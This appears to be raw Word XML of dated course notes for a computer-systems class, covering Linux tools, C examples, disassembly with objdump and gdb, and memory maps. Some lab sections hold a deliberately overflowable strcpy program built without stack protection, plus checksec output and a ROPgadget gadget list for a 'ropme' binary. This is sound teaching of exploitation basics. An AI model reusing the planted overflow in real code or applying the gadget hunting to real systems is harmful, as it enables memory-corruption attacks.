            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="yhseyhs : —$ &#10;RELRO &#10;Full RELRO &#10;checksec --file= ./hello &#10;STACK CANARY &#10;No canarv found &#10;enabled &#10;PIE &#10;PIE &#10;enabled &#10;R PATH &#10;No RPATH &#10;RUNPATH &#10;No RUNPATH &#10;Symbol s &#10;36) Svmbols &#10;FORTIFY &#10;No &#10;Forti fied &#10;Fortifiable &#10;FILE &#10;. /hello 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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tiano74z3m8w" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux command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tar xvf datalab-handout.tar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tar cvf datalab-handout.tar datalab-handout/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tar cvfz datalab-handout.tar.gz datalab-handout/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man / less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Ctrl + F : page down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Ctrl + B : page up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j / k : move cursor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/ : search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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4ppmihyimcjy" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vi command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 *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:n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:files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:sp .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:vs .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:make -f Makefile.hexdup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&lt;shift&gt;+k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:copen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:cclose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:cn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:cp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&lt;ctrl&gt;+w+w </w:t>
            </w:r>
          </w:p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12wml8igynuy" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t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bcejon28ca7v" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using putty (Windows)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6uatpw2t3eup" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh (MacOS/Linux)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% ssh yhs@192.168.64.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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196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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lp6hk1v5dtyw" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Server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C12345678</w:t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ssh -p 2222  [Student ID]@122.38.251.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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4305300" cy="421005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398145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mhit4v5ccbch" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filezilla intallation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sftp://122.38.251.9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54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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wxffz2s39at8" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sshd installation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120" w:before="220" w:line="360" w:lineRule="auto"/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shd w:fill="2d2d2d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo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shd w:fill="2d2d2d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt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shd w:fill="2d2d2d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">install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openssh-server</w:t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shd w:fill="2d2d2d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo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 systemctl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="cc99cd"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="2d2d2d" w:val="clear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sshd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:spacing w:after="120" w:before="220" w:line="360" w:lineRule="auto"/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</w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f08d49"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="2d2d2d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo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4"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="2d2d2d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  systemctl restart sshd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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jeo1i7fysdcy" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.09.15 </w:t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nuu5lccm50ru" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C code example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hello.c </w:t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#include &lt;stdio.h&gt; </w:t>
            </w:r>
          </w:p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int main(int argc, char * argv[]) </w:t>
            </w:r>
          </w:p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printf(“Hello, World!\n”); </w:t>
            </w:r>
          </w:p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ab/>
              <w:t xml:space="preserve">return 0; </w:t>
            </w:r>
          </w:p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gcc -o hello hello.c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Makefile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gcc -ggdb -o hello hello.c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main(int argc, char * argv[])</w:t>
            </w:r>
          </w:p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int num;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printf("input :\n");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scanf("%d", &amp;num);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printf(" num: %d\n", num);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return 0;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gcc -o scanf_example scanf_example.c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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pixgl8vw4xu2" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.09.22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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x57oyyj2h4q3" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.10.06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ssh -p 2222 (‘C’ + Student ID)@122.38.251.9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show_bits.c </w:t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typedef unsigned char *pointer;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void show_bytes(pointer start, size_t len){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size_t i;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for (i = 0; i &lt; len; i++)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printf("%p\t0x%.2x\n",start+i, start[i]);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printf("\n");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int a = 15213;</w:t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printf("int a = 15213;\n");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show_bytes((pointer) &amp;a, sizeof(int));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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return 0;</w:t>
            </w:r>
          </w:p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Makefile </w:t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 show_bits show_bits.c</w:t>
            </w:r>
          </w:p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./show_bits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a = 15213;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0x7ffdadcc82c4</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x6d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0x7ffdadcc82c5</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x3b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0x7ffdadcc82c6</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00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0x7ffdadcc82c7</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00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typedef unsigned char *pointer;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void show_bytes(pointer start, size_t len){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size_t i;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for (i = 0; i &lt; len; i++)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printf("%p\t0x%.2x\n",start+i, start[i]);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printf("\n");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int B = -15213;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int *P = &amp;B;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show_bytes((pointer)&amp;P, sizeof(long int));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       return 0;</w:t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./show_bits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0x7ffefd01e6d0</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xcc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0x7ffefd01e6d1</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xe6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0x7ffefd01e6d2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x01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0x7ffefd01e6d3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xfd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0x7ffefd01e6d4</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xfe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0x7ffefd01e6d5</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x7f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0x7ffefd01e6d6</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00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0x7ffefd01e6d7</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00</w:t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objdump -d -M intel hexdump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objdump -d -M att hexdump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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iue9gstqk4ao" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.10.06 (Makeup class for Chuseok holiday)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ex1.c </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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long arith</w:t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(long x, long y, long z)</w:t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t1 = x+y;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t2 = z+t1;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t3 = x+4;</w:t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t4 = y * 48;</w:t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t5 = t3 + t4;</w:t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long rval = t2 * t5;</w:t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return rval;</w:t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int a=10, b=20, c=30;</w:t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arith(a,b,c);</w:t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return 0;</w:t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Makefile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-Og -S ex1.c</w:t>
            </w:r>
          </w:p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-c ex1.c</w:t>
            </w:r>
          </w:p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-Og -o ex1 ex1.c</w:t>
            </w:r>
          </w:p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sum.c </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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long plus(long x, long y);</w:t>
            </w:r>
          </w:p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void sumstore(long x, long y,</w:t>
            </w:r>
          </w:p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      long *dest)</w:t>
            </w:r>
          </w:p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long t = plus(x, y);</w:t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*dest = t;</w:t>
            </w:r>
          </w:p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long a=10, b=20, ans=0;</w:t>
            </w:r>
          </w:p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sumstore(a,b,&amp;ans);</w:t>
            </w:r>
          </w:p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return 0;</w:t>
            </w:r>
          </w:p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long plus(long x, long y)</w:t>
            </w:r>
          </w:p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return x+y;</w:t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Makefile.sum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-Og -S sum.c</w:t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-Og -c sum.c</w:t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-Og sum.c plus.c -o sum</w:t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  <w:t xml:space="preserve">$ make -f Makefile.sum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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objdump -d sum</w:t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0000000000001169 &lt;sumstore&gt;:</w:t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1169:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">f3 0f 1e fa          </w:t>
              <w:tab/>
              <w:t xml:space="preserve">endbr64</w:t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116d:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">53                   </w:t>
              <w:tab/>
              <w:t xml:space="preserve">push   %rbx</w:t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116e:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">48 89 d3             </w:t>
              <w:tab/>
              <w:t xml:space="preserve">mov    %rdx,%rbx</w:t>
            </w:r>
          </w:p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1171:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">e8 6d 00 00 00       </w:t>
              <w:tab/>
              <w:t xml:space="preserve">callq  11e3 &lt;plus&gt;</w:t>
            </w:r>
          </w:p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1176:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">48 89 03             </w:t>
              <w:tab/>
              <w:t xml:space="preserve">mov    %rax,(%rbx)</w:t>
            </w:r>
          </w:p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1179:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">5b                   </w:t>
              <w:tab/>
              <w:t xml:space="preserve">pop    %rbx</w:t>
            </w:r>
          </w:p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117a:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">c3                   </w:t>
              <w:tab/>
              <w:t xml:space="preserve">retq</w:t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gdb </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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disassemble sumstore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Dump of assembler code for function sumstore:</w:t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0x0000555555555169 &lt;+0&gt;:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">endbr64</w:t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0x000055555555516d &lt;+4&gt;:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">push   rbx</w:t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0x000055555555516e &lt;+5&gt;:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">mov    rbx,rdx</w:t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0x0000555555555171 &lt;+8&gt;:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">call   0x5555555551e3 &lt;plus&gt;</w:t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0x0000555555555176 &lt;+13&gt;:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">mov    QWORD PTR [rbx],rax</w:t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0x0000555555555179 &lt;+16&gt;:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">pop    rbx</w:t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0x000055555555517a &lt;+17&gt;:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">ret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End of assembler dump.</w:t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pdisass sumstore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► 0x555555555169 &lt;sumstore&gt;       endbr64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0x55555555516d &lt;sumstore+4&gt;     push   rbx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0x55555555516e &lt;sumstore+5&gt;     mov    rbx, rdx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0x555555555171 &lt;sumstore+8&gt;     call   plus                &lt;plus&gt;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0x555555555176 &lt;sumstore+13&gt;    mov    qword ptr [rbx], rax</w:t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0x555555555179 &lt;sumstore+16&gt;    pop    rbx</w:t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0x55555555517a &lt;sumstore+17&gt;    ret</w:t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0x55555555517b &lt;main&gt;           endbr64</w:t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0x55555555517f &lt;main+4&gt;         push   rbx</w:t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0x555555555180 &lt;main+5&gt;         sub    rsp, 0x10</w:t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0x555555555184 &lt;main+9&gt;         mov    ebx, 0x28</w:t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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zhqp1jx3sjx4" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.10.13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objdump -d -M intel hexdump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objdump -d -M att hexdump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callfoo.c </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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"callfoo.c" 15L, 171C                                                                                                                                           8,5           All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/* copy string x to buf */</w:t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void foo(char *x) {</w:t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int buf[1];</w:t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strcpy((char *)buf, x);</w:t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void callfoo() {</w:t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foo("abcdefghi");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callfoo();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Makefile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  gcc -m32 -O0 -fno-stack-protector -no-pie -fno-PIC -o callfoo callfoo.c</w:t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You can download `callfoo_` from here : https://shorturl.at/bcBX8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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n3ngkiojlit" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.10.27 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typedef struct {</w:t>
            </w:r>
          </w:p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int a[2];</w:t>
            </w:r>
          </w:p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double d;</w:t>
            </w:r>
          </w:p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 struct_t;</w:t>
            </w:r>
          </w:p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double fun(int i) {</w:t>
            </w:r>
          </w:p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volatile struct_t s;</w:t>
            </w:r>
          </w:p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s.d = 3.14;</w:t>
            </w:r>
          </w:p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s.a[i] = 1073741824; /* Possibly out of bounds */</w:t>
            </w:r>
          </w:p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return s.d;</w:t>
            </w:r>
          </w:p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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tve2hma8a6e3" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.11.03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$ cat /proc/self/maps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55a6f0107000-55a6f0109000 r--p 00000000 fd:00 6029845                    /usr/bin/cat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55a6f0109000-55a6f010e000 r-xp 00002000 fd:00 6029845                    /usr/bin/cat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55a6f010e000-55a6f0111000 r--p 00007000 fd:00 6029845                    /usr/bin/cat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55a6f0111000-55a6f0112000 r--p 00009000 fd:00 6029845                    /usr/bin/cat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55a6f0112000-55a6f0113000 rw-p 0000a000 fd:00 6029845                    /usr/bin/cat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55a6f0451000-55a6f0472000 rw-p 00000000 00:00 0                          [heap]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7f6c624cd000-7f6c624ef000 rw-p 00000000 00:00 0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7f6c624ef000-7f6c62521000 r--p 00000000 fd:00 6037750                    /usr/lib/locale/C.UTF-8/LC_CTYPE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7f6c62521000-7f6c62694000 r--p 00000000 fd:00 6037749                    /usr/lib/locale/C.UTF-8/LC_COLLATE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7f6c62694000-7f6c6297a000 r--p 00000000 fd:00 6030133                    /usr/lib/locale/locale-archive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7f6c6297a000-7f6c6299c000 r--p 00000000 fd:00 6045515                    /usr/lib/x86_64-linux-gnu/libc-2.31.so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7f6c6299c000-7f6c62b14000 r-xp 00022000 fd:00 6045515                    /usr/lib/x86_64-linux-gnu/libc-2.31.so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7f6c62b14000-7f6c62b62000 r--p 0019a000 fd:00 6045515                    /usr/lib/x86_64-linux-gnu/libc-2.31.so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7f6c62b62000-7f6c62b66000 r--p 001e7000 fd:00 6045515                    /usr/lib/x86_64-linux-gnu/libc-2.31.so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7f6c62b66000-7f6c62b68000 rw-p 001eb000 fd:00 6045515                    /usr/lib/x86_64-linux-gnu/libc-2.31.so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7f6c62b68000-7f6c62b6e000 rw-p 00000000 00:00 0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7f6c62b73000-7f6c62b74000 r--p 00000000 fd:00 6037756                    /usr/lib/locale/C.UTF-8/LC_NUMERIC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7f6c62b74000-7f6c62b75000 r--p 00000000 fd:00 6037759                    /usr/lib/locale/C.UTF-8/LC_TIME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7f6c62b75000-7f6c62b76000 r--p 00000000 fd:00 6037754                    /usr/lib/locale/C.UTF-8/LC_MONETARY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7f6c62b76000-7f6c62b77000 r--p 00000000 fd:00 6037753                    /usr/lib/locale/C.UTF-8/LC_MESSAGES/SYS_LC_MESSAGES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7f6c62b77000-7f6c62b78000 r--p 00000000 fd:00 6037757                    /usr/lib/locale/C.UTF-8/LC_PAPER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7f6c62b78000-7f6c62b79000 r--p 00000000 fd:00 6037755                    /usr/lib/locale/C.UTF-8/LC_NAME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7f6c62b79000-7f6c62b7a000 r--p 00000000 fd:00 6037748                    /usr/lib/locale/C.UTF-8/LC_ADDRESS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7f6c62b7a000-7f6c62b7b000 r--p 00000000 fd:00 6037758                    /usr/lib/locale/C.UTF-8/LC_TELEPHONE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7f6c62b7b000-7f6c62b7c000 r--p 00000000 fd:00 6037752                    /usr/lib/locale/C.UTF-8/LC_MEASUREMENT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7f6c62b7c000-7f6c62b83000 r--s 00000000 fd:00 6169889                    /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache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7f6c62b83000-7f6c62b84000 r--p 00000000 fd:00 6035110                    /usr/lib/x86_64-linux-gnu/ld-2.31.so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7f6c62b84000-7f6c62ba7000 r-xp 00001000 fd:00 6035110                    /usr/lib/x86_64-linux-gnu/ld-2.31.so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7f6c62ba7000-7f6c62baf000 r--p 00024000 fd:00 6035110                    /usr/lib/x86_64-linux-gnu/ld-2.31.so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7f6c62baf000-7f6c62bb0000 r--p 00000000 fd:00 6037751                    /usr/lib/locale/C.UTF-8/LC_IDENTIFICATION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7f6c62bb0000-7f6c62bb1000 r--p 0002c000 fd:00 6035110                    /usr/lib/x86_64-linux-gnu/ld-2.31.so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7f6c62bb1000-7f6c62bb2000 rw-p 0002d000 fd:00 6035110                    /usr/lib/x86_64-linux-gnu/ld-2.31.so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7f6c62bb2000-7f6c62bb3000 rw-p 00000000 00:00 0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7ffe06056000-7ffe06077000 rw-p 00000000 00:00 0                          [stack]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7ffe060cb000-7ffe060ce000 r--p 00000000 00:00 0                          [vvar]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7ffe060ce000-7ffe060cf000 r-xp 00000000 00:00 0                          [vdso]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ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]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ldd /bin/ls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ab/>
        <w:t xml:space="preserve">linux-vdso.so.1 (0x00007ffe1d39a000)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  <w:t xml:space="preserve">libselinux.so.1 =&gt; /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fa296db1000)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ab/>
        <w:t xml:space="preserve">libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa296bbf000)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ab/>
        <w:t xml:space="preserve">libpcre2-8.so.0 =&gt; /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007fa296b2e000)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ab/>
        <w:t xml:space="preserve">libdl.so.2 =&gt; /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fa296b28000)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ab/>
        <w:t xml:space="preserve">/lib64/ld-linux-x86-64.so.2 (0x00007fa296e18000)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  <w:t xml:space="preserve">libpthread.so.0 =&gt; /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fa296b05000)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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hn02k58fq8sx" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">checksec </w:t>
        <w:tab/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checksec --file ./ropme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[*] '/home/nshc/moon/computer_system/project/ROPME/ropme'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Arch:     amd64-64-little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RELRO:    Partial RELRO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Stack:    No canary found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NX:       NX enabled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PIE:      No PIE (0x400000)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ROPgadget --binary ./ropme</w:t>
            </w:r>
          </w:p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Gadgets information</w:t>
            </w:r>
          </w:p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============================================================</w:t>
            </w:r>
          </w:p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0x00000000004010bd : add ah, dh ; nop ; endbr64 ; ret</w:t>
            </w:r>
          </w:p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0x00000000004011a0 : add al, ch ; retf 0xfffe</w:t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0x00000000004010eb : add bh, bh ; loopne 0x401155 ; nop ; ret</w:t>
            </w:r>
          </w:p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0x000000000040119e : add byte ptr [rax], al ; add al, ch ; retf 0xfffe</w:t>
            </w:r>
          </w:p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0x000000000040128c : add byte ptr [rax], al ; add byte ptr [rax], al ; endbr64 ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401219 : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret</w:t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0x000000000040121a : add byte ptr [rax], al ; add cl, cl ; ret</w:t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0x0000000000401036 : add byte ptr [rax], al ; add dl, dh ; jmp 0x401020</w:t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0x000000000040115a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret</w:t>
            </w:r>
          </w:p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0x000000000040128e : add byte ptr [rax], al ; endbr64 ; ret</w:t>
            </w:r>
          </w:p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0x00000000004010bc : add byte ptr [rax], al ; hlt ; nop ; endbr64 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040121b : add byte ptr [rax], al ; leave ; ret</w:t>
            </w:r>
          </w:p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0x000000000040100d : add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax</w:t>
            </w:r>
          </w:p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0x000000000040115b : add byte ptr [rcx], al ; pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401159 : add byte ptr cs:[rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret</w:t>
            </w:r>
          </w:p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0x000000000040121c : add cl, cl ; ret</w:t>
            </w:r>
          </w:p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0x00000000004010ea : add dil, dil ; loopne 0x401155 ; nop ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401038 : add dl, dh ; jmp 0x401020</w:t>
            </w:r>
          </w:p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0x000000000040115c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401157 : add eax, 0x2efb ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401017 : add esp, 8 ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401016 : add rsp, 8 ; ret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0x00000000004011a5 : call qword ptr [rax + 0xff3c3c9]</w:t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0x000000000040103e : call qword ptr [rax - 0x5e1f00d]</w:t>
            </w:r>
          </w:p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0x0000000000401014 : call rax</w:t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0x0000000000401173 : cli ; jmp 0x401100</w:t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0x00000000004010c3 : cli ; ret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0x000000000040129b : cli ; sub rsp, 8 ; add rsp, 8 ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401170 : endbr64 ; jmp 0x401100</w:t>
            </w:r>
          </w:p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0x00000000004010c0 : endbr64 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040126c : fisttp word ptr [rax - 0x7d] ; ret</w:t>
            </w:r>
          </w:p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0x00000000004010be : hlt ; nop ; endbr64 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040117d : in eax, 0x5a ; pop rsi ; pop rdi ; nop ; pop rbp ; ret</w:t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0x0000000000401012 : je 0x401016 ; call rax</w:t>
            </w:r>
          </w:p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0x00000000004010e5 : je 0x4010f0 ; mov edi, 0x404040 ; jmp rax</w:t>
            </w:r>
          </w:p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0x0000000000401127 : je 0x401130 ; mov edi, 0x404040 ; jmp rax</w:t>
            </w:r>
          </w:p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0x000000000040103a : jmp 0x401020</w:t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0x0000000000401174 : jmp 0x401100</w:t>
            </w:r>
          </w:p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0x000000000040100b : jmp 0x4840103f</w:t>
            </w:r>
          </w:p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0x00000000004010ec : jmp rax</w:t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0x00000000004011a7 : leave ; ret</w:t>
            </w:r>
          </w:p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0x00000000004010ed : loopne 0x401155 ; nop ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401156 : mov byte ptr [rip + 0x2efb], 1 ; pop rbp ; ret</w:t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0x0000000000401218 : mov eax, 0 ; leave ; ret</w:t>
            </w:r>
          </w:p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0x000000000040117c : mov ebp, esp ; pop rdx ; pop rsi ; pop rdi ; nop ; pop rbp ; ret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0x00000000004010e7 : mov edi, 0x404040 ; jmp rax</w:t>
            </w:r>
          </w:p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0x000000000040117b : mov rbp, rsp ; pop rdx ; pop rsi ; pop rdi ; nop ; pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x00000000004010bf : nop ; endbr64 ; ret</w:t>
            </w:r>
          </w:p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0x00000000004011a6 : nop ; leave ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401181 : nop ; pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x00000000004010ef : nop ; ret</w:t>
            </w:r>
          </w:p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0x000000000040116c : nop dword ptr [rax] ; endbr64 ; jmp 0x401100</w:t>
            </w:r>
          </w:p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0x00000000004010e6 : or dword ptr [rdi + 0x404040], edi ; jmp rax</w:t>
            </w:r>
          </w:p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0x000000000040127c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040127e : pop r13 ; pop r14 ; pop r15 ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401280 : pop r14 ; pop r15 ; ret</w:t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0x0000000000401282 : pop r15 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040127b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040127f : pop rbp ; pop r14 ; pop r15 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040115d : pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401180 : pop rdi ; nop ; pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401283 : pop rdi ; ret</w:t>
            </w:r>
          </w:p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0x000000000040117e : pop rdx ; pop rsi ; pop rdi ; nop ; pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x0000000000401281 : pop rsi ; pop r15 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040117f : pop rsi ; pop rdi ; nop ; pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x000000000040127d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040117a : push rbp ; mov rbp, rsp ; pop rdx ; pop rsi ; pop rdi ; nop ; pop rbp ; ret</w:t>
            </w:r>
          </w:p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0x000000000040101a : ret</w:t>
            </w:r>
          </w:p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0x00000000004011a2 : retf 0xfffe</w:t>
            </w:r>
          </w:p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0x0000000000401011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret</w:t>
            </w:r>
          </w:p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0x000000000040105b : sar edi, 0xff ; call qword ptr [rax - 0x5e1f00d]</w:t>
            </w:r>
          </w:p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0x0000000000401158 : sti ; add byte ptr cs:[rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret</w:t>
            </w:r>
          </w:p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0x000000000040129d : sub esp, 8 ; add rsp, 8 ; ret</w:t>
